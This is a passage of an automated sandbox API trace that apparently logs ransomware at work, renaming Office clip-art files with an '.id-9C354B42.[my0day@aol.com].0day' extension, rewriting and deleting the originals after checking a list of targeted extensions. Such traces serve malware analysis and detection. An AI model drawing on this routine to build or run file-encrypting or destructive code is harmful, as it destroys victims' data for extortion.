nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.503] SetEndOfFile (hFile=0x380) returned 1 [0270.503] CloseHandle (hObject=0x380) returned 1 [0270.503] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.503] SetEndOfFile (hFile=0x398) returned 1 [0270.506] CloseHandle (hObject=0x398) returned 1 [0270.506] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.508] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf")) returned 1 [0270.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0270.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0270.508] lstrlenW (lpString=".doc") returned 4 [0270.508] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.508] lstrlenW (lpString=".docx") returned 5 [0270.508] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.508] lstrlenW (lpString=".pdf") returned 4 [0270.508] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.508] lstrlenW (lpString=".xls") returned 4 [0270.508] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.508] lstrlenW (lpString=".xlsx") returned 5 [0270.508] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.508] lstrlenW (lpString=".ppt") returned 4 [0270.508] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0270.508] lstrlenW (lpString=".zip") returned 4 [0270.508] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.508] lstrlenW (lpString=".rar") returned 4 [0270.508] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.508] lstrlenW (lpString=".bz2") returned 4 [0270.509] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.509] lstrlenW (lpString=".7z") returned 3 [0270.509] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0270.509] lstrlenW (lpString=".dbf") returned 4 [0270.509] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0270.509] lstrlenW (lpString=".1cd") returned 4 [0270.509] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0270.509] lstrlenW (lpString=".jpg") returned 4 [0270.509] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0270.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0270.509] lstrlenW (lpString=".doc") returned 4 [0270.509] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.509] lstrlenW (lpString=".docx") returned 5 [0270.509] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.509] lstrlenW (lpString=".pdf") returned 4 [0270.509] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.509] lstrlenW (lpString=".xls") returned 4 [0270.509] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.509] lstrlenW (lpString=".xlsx") returned 5 [0270.509] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.509] lstrlenW (lpString=".ppt") returned 4 [0270.509] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0270.510] lstrlenW (lpString=".zip") returned 4 [0270.510] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.510] lstrlenW (lpString=".rar") returned 4 [0270.510] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.510] lstrlenW (lpString=".bz2") returned 4 [0270.510] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.510] lstrlenW (lpString=".7z") returned 3 [0270.510] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0270.510] lstrlenW (lpString=".dbf") returned 4 [0270.510] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0270.510] lstrlenW (lpString=".1cd") returned 4 [0270.510] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 63 [0270.510] lstrlenW (lpString=".jpg") returned 4 [0270.510] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.510] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.510] lstrlenW (lpString="BL00648_.WMF") returned 12 [0270.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0270.510] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=11500) returned 1 [0270.511] CloseHandle (hObject=0x398) returned 1 [0270.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf")) returned 0x20 [0270.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0270.511] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.511] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.511] GetLastError () returned 0x0 [0270.511] ReadFile (in: hFile=0x398, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x2cec, lpOverlapped=0x0) returned 1 [0270.513] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x2cf0, lpOverlapped=0x0) returned 1 [0270.515] ReadFile (in: hFile=0x398, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0270.515] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.515] SetEndOfFile (hFile=0x380) returned 1 [0270.515] CloseHandle (hObject=0x380) returned 1 [0270.515] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.515] SetEndOfFile (hFile=0x398) returned 1 [0270.518] CloseHandle (hObject=0x398) returned 1 [0270.518] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.518] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf")) returned 1 [0270.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0270.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0270.519] lstrlenW (lpString=".doc") returned 4 [0270.519] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.519] lstrlenW (lpString=".docx") returned 5 [0270.519] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.519] lstrlenW (lpString=".pdf") returned 4 [0270.519] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.519] lstrlenW (lpString=".xls") returned 4 [0270.519] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.519] lstrlenW (lpString=".xlsx") returned 5 [0270.519] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.519] lstrlenW (lpString=".ppt") returned 4 [0270.519] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0270.519] lstrlenW (lpString=".zip") returned 4 [0270.519] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.519] lstrlenW (lpString=".rar") returned 4 [0270.519] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.519] lstrlenW (lpString=".bz2") returned 4 [0270.519] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.519] lstrlenW (lpString=".7z") returned 3 [0270.519] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0270.519] lstrlenW (lpString=".dbf") returned 4 [0270.519] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0270.519] lstrlenW (lpString=".1cd") returned 4 [0270.520] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0270.520] lstrlenW (lpString=".jpg") returned 4 [0270.520] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0270.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0270.520] lstrlenW (lpString=".doc") returned 4 [0270.520] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.520] lstrlenW (lpString=".docx") returned 5 [0270.520] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.520] lstrlenW (lpString=".pdf") returned 4 [0270.520] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.520] lstrlenW (lpString=".xls") returned 4 [0270.520] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.520] lstrlenW (lpString=".xlsx") returned 5 [0270.520] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.520] lstrlenW (lpString=".ppt") returned 4 [0270.520] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0270.520] lstrlenW (lpString=".zip") returned 4 [0270.520] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.520] lstrlenW (lpString=".rar") returned 4 [0270.520] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.520] lstrlenW (lpString=".bz2") returned 4 [0270.520] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.520] lstrlenW (lpString=".7z") returned 3 [0270.520] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0270.520] lstrlenW (lpString=".dbf") returned 4 [0270.520] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0270.520] lstrlenW (lpString=".1cd") returned 4 [0270.520] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 63 [0270.521] lstrlenW (lpString=".jpg") returned 4 [0270.521] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.521] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.521] lstrlenW (lpString="BL00921_.WMF") returned 12 [0270.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0270.524] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=4408) returned 1 [0270.524] CloseHandle (hObject=0x398) returned 1 [0270.524] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf")) returned 0x20 [0270.524] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0270.525] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.525] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.530] GetLastError () returned 0x0 [0270.530] ReadFile (in: hFile=0x398, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x1138, lpOverlapped=0x0) returned 1 [0270.532] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x1140, lpOverlapped=0x0) returned 1 [0270.533] ReadFile (in: hFile=0x398, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0270.533] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.533] SetEndOfFile (hFile=0x380) returned 1 [0270.533] CloseHandle (hObject=0x380) returned 1 [0270.533] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.533] SetEndOfFile (hFile=0x398) returned 1 [0270.536] CloseHandle (hObject=0x398) returned 1 [0270.536] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.537] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf")) returned 1 [0270.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0270.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0270.537] lstrlenW (lpString=".doc") returned 4 [0270.537] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.537] lstrlenW (lpString=".docx") returned 5 [0270.537] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.537] lstrlenW (lpString=".pdf") returned 4 [0270.537] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.537] lstrlenW (lpString=".xls") returned 4 [0270.537] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.537] lstrlenW (lpString=".xlsx") returned 5 [0270.537] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.537] lstrlenW (lpString=".ppt") returned 4 [0270.537] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0270.537] lstrlenW (lpString=".zip") returned 4 [0270.537] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.537] lstrlenW (lpString=".rar") returned 4 [0270.537] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.537] lstrlenW (lpString=".bz2") returned 4 [0270.537] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.537] lstrlenW (lpString=".7z") returned 3 [0270.537] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0270.538] lstrlenW (lpString=".dbf") returned 4 [0270.538] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0270.538] lstrlenW (lpString=".1cd") returned 4 [0270.538] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0270.538] lstrlenW (lpString=".jpg") returned 4 [0270.538] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0270.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0270.538] lstrlenW (lpString=".doc") returned 4 [0270.538] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.538] lstrlenW (lpString=".docx") returned 5 [0270.538] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.538] lstrlenW (lpString=".pdf") returned 4 [0270.538] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.538] lstrlenW (lpString=".xls") returned 4 [0270.538] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.538] lstrlenW (lpString=".xlsx") returned 5 [0270.538] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.538] lstrlenW (lpString=".ppt") returned 4 [0270.538] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0270.538] lstrlenW (lpString=".zip") returned 4 [0270.538] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.538] lstrlenW (lpString=".rar") returned 4 [0270.538] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.538] lstrlenW (lpString=".bz2") returned 4 [0270.539] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.539] lstrlenW (lpString=".7z") returned 3 [0270.539] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0270.539] lstrlenW (lpString=".dbf") returned 4 [0270.539] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0270.539] lstrlenW (lpString=".1cd") returned 4 [0270.539] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0270.539] lstrlenW (lpString=".jpg") returned 4 [0270.539] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.539] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.539] lstrlenW (lpString="BL00923_.WMF") returned 12 [0270.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0270.539] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=6256) returned 1 [0270.539] CloseHandle (hObject=0x398) returned 1 [0270.539] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf")) returned 0x20 [0270.540] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0270.540] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.540] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.540] GetLastError () returned 0x0 [0270.540] ReadFile (in: hFile=0x398, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x1870, lpOverlapped=0x0) returned 1 [0270.542] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x1880, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x1880, lpOverlapped=0x0) returned 1 [0270.543] ReadFile (in: hFile=0x398, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0270.543] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.543] SetEndOfFile (hFile=0x380) returned 1 [0270.543] CloseHandle (hObject=0x380) returned 1 [0270.543] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.543] SetEndOfFile (hFile=0x398) returned 1 [0270.546] CloseHandle (hObject=0x398) returned 1 [0270.546] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.546] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf")) returned 1 [0270.547] 